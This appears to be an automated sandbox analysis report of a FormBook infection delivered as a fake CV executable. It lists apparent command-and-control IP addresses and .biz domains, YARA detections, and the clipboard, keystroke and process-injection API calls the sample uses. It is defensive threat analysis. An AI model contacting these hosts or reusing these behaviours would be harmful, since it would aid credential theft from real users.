            Source: armsvc.exe, 00000001.00000003.1888579628.0000000000866000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1846487976.0000000000866000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1878027562.0000000000866000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1808457765.000000000085D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1792063826.0000000000835000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1827053166.0000000000862000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1836547301.0000000000866000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1887697085.0000000000835000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1848063839.0000000000866000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1807715795.0000000000835000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1792588219.000000000085D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1859675782.0000000000866000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1828346224.0000000000865000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1809068999.000000000085F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1838107320.0000000000866000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.229.117.57/
            Source: armsvc.exe, 00000001.00000003.1230504734.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.229.117.57/#
            Source: armsvc.exe, 00000001.00000003.1887697085.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.229.117.57//
            Source: armsvc.exe, 00000001.00000003.1230504734.0000000000835000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1792063826.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.229.117.57/12
            Source: armsvc.exe, 00000001.00000003.1230504734.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.229.117.57/12$
            Source: armsvc.exe, 00000001.00000003.1230504734.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.229.117.57/12l
            Source: armsvc.exe, 00000001.00000003.1887697085.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.229.117.57/Y
            Source: armsvc.exe, 00000001.00000003.1230345165.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.229.117.57/ehgyq
            Source: armsvc.exe, 00000001.00000003.1888579628.0000000000866000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://3.229.117.57/h
            Source: armsvc.exe, 00000001.00000003.1846896060.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.227.7.138/
            Source: armsvc.exe, 00000001.00000003.1846487976.0000000000866000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1848063839.0000000000866000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1859675782.0000000000866000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.227.7.138/h
            Source: armsvc.exe, 00000001.00000003.1846896060.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.227.7.138/tR
            Source: armsvc.exe, 00000001.00000003.1837228668.000000000084E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1837228668.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.245.175.187/
            Source: armsvc.exe, 00000001.00000003.1837228668.0000000000842000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1837835143.0000000000843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.245.175.187/ekvacjbfhlcxed
            Source: armsvc.exe, 00000001.00000003.1759623252.0000000000835000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1792588219.000000000085D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1783483141.0000000000859000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1828346224.0000000000865000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1779767348.000000000084E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1809068999.000000000085F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1838107320.0000000000866000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/
            Source: armsvc.exe, 00000001.00000003.1759623252.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/jrcjllgytrwdiwa
            Source: armsvc.exe, 00000001.00000003.1898410503.000000000088F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1194734218.0000000000835000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1899619197.0000000000866000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1219592416.0000000000835000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1899320793.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.11.240.239/
            Source: armsvc.exe, 00000001.00000003.1899320793.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.11.240.239/2
            Source: armsvc.exe, 00000001.00000003.1219592416.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.11.240.239/6
            Source: armsvc.exe, 00000001.00000003.1898718118.0000000000874000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.11.240.239/gwwwatrrjcr
            Source: armsvc.exe, 00000001.00000003.1194629786.0000000000843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://52.11.240.239/ktxpmbh
            Source: armsvc.exe, 00000001.00000003.1250633299.0000000000835000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1267060067.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://72.52.178.23/
            Source: armsvc.exe, 00000001.00000003.1504609804.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/
            Source: armsvc.exe, 00000001.00000003.1743852930.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/Y
            Source: armsvc.exe, 00000001.00000003.1743852930.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://82.112.184.197/l
            Source: armsvc.exe, 00000001.00000003.1888579628.0000000000866000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1899619197.0000000000866000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bumxkqgxu.biz/
            Source: armsvc.exe, 00000001.00000003.1899619197.0000000000866000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dwrqljrr.biz/F
            Source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000002.1186807697.0000000000AF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pywolwnvd.biz/
            Source: armsvc.exe, 00000001.00000003.1878027562.0000000000866000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://qaynky.biz/
            Source: armsvc.exe, 00000001.00000003.1846487976.0000000000866000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1808457765.000000000085D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1827053166.0000000000862000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1836547301.0000000000866000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1848063839.0000000000866000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1792588219.000000000085D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1828346224.0000000000865000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1809068999.000000000085F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1838107320.0000000000866000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://saytjshyf.biz/
            Source: armsvc.exe, 00000001.00000003.1836547301.0000000000866000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1838107320.0000000000866000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tbjrpv.biz/h
            Source: armsvc.exe, 00000001.00000003.1808457765.000000000085D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1809068999.000000000085F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vcddkls.biz/h
            Source: armsvc.exe, 00000001.00000003.1826285923.0000000000871000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1898410503.000000000087C000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1876354501.000000000087C000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1858022510.000000000087C000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1846213320.000000000087C000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1840428616.000000000087C000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1826719979.000000000087C000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1886768349.000000000087C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.fwiwk.biz/iynbmylcmibn?usid=24&utid=11154212164
            Source: armsvc.exe, 00000001.00000003.1827053166.0000000000862000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1828346224.0000000000865000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww12.fwiwk.biz:80/iynbmylcmibn?usid=24&utid=11154212164ov
            Source: armsvc.exe, 00000001.00000003.1250633299.0000000000835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww7.przvgke.biz/
            Source: armsvc.exe, 00000001.00000003.1251250318.0000000000843000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1779767348.000000000084E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1809068999.000000000085F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1251250318.000000000084E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1836547301.000000000085D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww7.przvgke.biz/aosibypyx?usid=24&utid=11154196211
            Source: armsvc.exe, 00000001.00000003.1759623252.000000000084E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1858688778.000000000084E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1827184826.000000000085D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1808457765.000000000085D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1846896060.000000000085E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1504609804.000000000084E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1250633299.0000000000842000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1267060067.000000000084E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1743852930.000000000084E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1792588219.000000000085D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1783483141.0000000000859000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1251250318.0000000000843000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1779767348.000000000084E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1809068999.000000000085F000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1251250318.000000000084E000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1836547301.000000000085D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww7.przvgke.biz/gymegolihltgvcqo?usid=24&utid=11154195932
            Source: armsvc.exe, 00000001.00000003.1250633299.0000000000842000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1251250318.0000000000843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww7.przvgke.biz/ic
            Source: armsvc.exe, 00000001.00000003.1250633299.0000000000842000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1251250318.0000000000843000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww7.przvgke.biz:80/aosibypyx?usid=24&utid=11154196211
            Source: Au3Info_x64.exe.1.drString found in binary or memory: http://www.autoitscript.com/autoit3/
            Source: Au3Info_x64.exe.1.drString found in binary or memory: http://www.autoitscript.com/autoit3/8
            Source: 7EFPjTEjLAB4.exe, 00000026.00000002.2456798324.000000000557E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.leadmagnetkpis.shop
            Source: 7EFPjTEjLAB4.exe, 00000026.00000002.2456798324.000000000557E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.leadmagnetkpis.shop/gtvh/
            Source: armsvc.exe, 00000001.00000003.1490334759.0000000001CC0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
            Source: armsvc.exe, 00000001.00000003.1759623252.000000000084E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://xlfhhhm.biz/
            Source: mfpmp.exe, 00000019.00000003.1575820237.0000000007EED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
            Source: mfpmp.exe, 00000019.00000003.1575820237.0000000007EED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: mfpmp.exe, 00000019.00000003.1575820237.0000000007EED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: mfpmp.exe, 00000019.00000003.1575820237.0000000007EED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: Acrobat.exe.1.drString found in binary or memory: https://clients2.google.com/service/update2/crxBrowser
            Source: armsvc.exe, 00000001.00000003.1615845307.0000000002040000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxFailed
            Source: armsvc.exe, 00000001.00000003.1616664909.0000000002040000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1616958670.0000000002040000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxHKEY_LOCAL_MACHINE
            Source: Acrobat.exe.1.drString found in binary or memory: https://crbug.com/820996
            Source: Acrobat.exe.1.drString found in binary or memory: https://crbug.com/820996LaunchElevatedProcessdisable-best-effort-tasksdisable-breakpaddisable-featur
            Source: mfpmp.exe, 00000019.00000003.1575820237.0000000007EED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: mfpmp.exe, 00000019.00000003.1575820237.0000000007EED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
            Source: mfpmp.exe, 00000019.00000003.1575820237.0000000007EED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: mfpmp.exe, 00000019.00000003.1575820237.0000000007EED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
            Source: notification_click_helper.exe.1.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff
            Source: notification_click_helper.exe.1.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith
            Source: mfpmp.exe, 00000019.00000002.2422170365.0000000003206000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000003.1564477992.0000000003231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: mfpmp.exe, 00000019.00000003.1564477992.0000000003231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
            Source: mfpmp.exe, 00000019.00000002.2422170365.0000000003206000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033_KF
            Source: mfpmp.exe, 00000019.00000003.1564477992.0000000003231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: mfpmp.exe, 00000019.00000002.2422170365.0000000003206000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000003.1564477992.0000000003231000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: mfpmp.exe, 00000019.00000003.1562698228.0000000007EC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: AutoIt3Help.exe.1.drString found in binary or memory: https://www.autoitscript.com/site/autoit/8
            Source: mfpmp.exe, 00000019.00000003.1575820237.0000000007EED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
            Source: armsvc.exe, 00000001.00000003.1250633299.000000000082D000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1244597242.0000000002140000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1247885450.0000000002030000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1247980820.0000000002380000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1244407856.0000000002080000.00000004.00001000.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000002.2478056309.0000000006430000.00000004.00000800.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000002.2458318969.0000000004388000.00000004.10000000.00040000.00000000.sdmp, 7EFPjTEjLAB4.exe, 00000026.00000002.2450983821.00000000037C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: mfpmp.exe, 00000019.00000003.1575820237.0000000007EED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00474164
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00474164
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00473F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00473F66
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0046001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_0046001C
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0048CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0048CABC

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000003.00000002.1356343056.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1351634880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.2445449912.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.1356486981.0000000003DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000026.00000002.2456798324.00000000054F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.2410421915.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000019.00000002.2419943253.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2445724285.0000000002FB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Binary is likely a compiled AutoIt script file
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: This is a third-party compiled AutoIt script.0_2_00403B3A
            Source: CV_Sales Representative - Job Request PDF.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000000.1161101843.00000000004B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_a5b3e2f6-3
            Source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000000.1161101843.00000000004B4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_048895c7-8
            Source: CV_Sales Representative - Job Request PDF.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c69d0902-a
            Source: CV_Sales Representative - Job Request PDF.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_d0da1ef9-3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0042CBC3 NtClose,3_2_0042CBC3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72B60 NtClose,LdrInitializeThunk,3_2_03A72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_03A72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A735C0 NtCreateMutant,LdrInitializeThunk,3_2_03A735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A74340 NtSetContextThread,3_2_03A74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A74650 NtSuspendThread,3_2_03A74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72BA0 NtEnumerateValueKey,3_2_03A72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72B80 NtQueryInformationFile,3_2_03A72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72BE0 NtQueryValueKey,3_2_03A72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72BF0 NtAllocateVirtualMemory,3_2_03A72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72AB0 NtWaitForSingleObject,3_2_03A72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72AF0 NtWriteFile,3_2_03A72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72AD0 NtReadFile,3_2_03A72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72FA0 NtQuerySection,3_2_03A72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72FB0 NtResumeThread,3_2_03A72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72F90 NtProtectVirtualMemory,3_2_03A72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72FE0 NtCreateFile,3_2_03A72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72F30 NtCreateSection,3_2_03A72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72F60 NtCreateProcessEx,3_2_03A72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72EA0 NtAdjustPrivilegesToken,3_2_03A72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72E80 NtReadVirtualMemory,3_2_03A72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72EE0 NtQueueApcThread,3_2_03A72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72E30 NtWriteVirtualMemory,3_2_03A72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72DB0 NtEnumerateKey,3_2_03A72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72DD0 NtDelayExecution,3_2_03A72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72D30 NtUnmapViewOfSection,3_2_03A72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72D00 NtSetInformationFile,3_2_03A72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72D10 NtMapViewOfSection,3_2_03A72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72CA0 NtQueryInformationToken,3_2_03A72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72CF0 NtOpenProcess,3_2_03A72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72CC0 NtQueryVirtualMemory,3_2_03A72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72C00 NtQueryInformationProcess,3_2_03A72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72C60 NtCreateKey,3_2_03A72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A72C70 NtFreeVirtualMemory,3_2_03A72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A73090 NtSetValueKey,3_2_03A73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A73010 NtOpenDirectoryObject,3_2_03A73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A739B0 NtGetContextThread,3_2_03A739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A73D10 NtOpenProcessToken,3_2_03A73D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A73D70 NtOpenThread,3_2_03A73D70
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0046A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0046A1EF
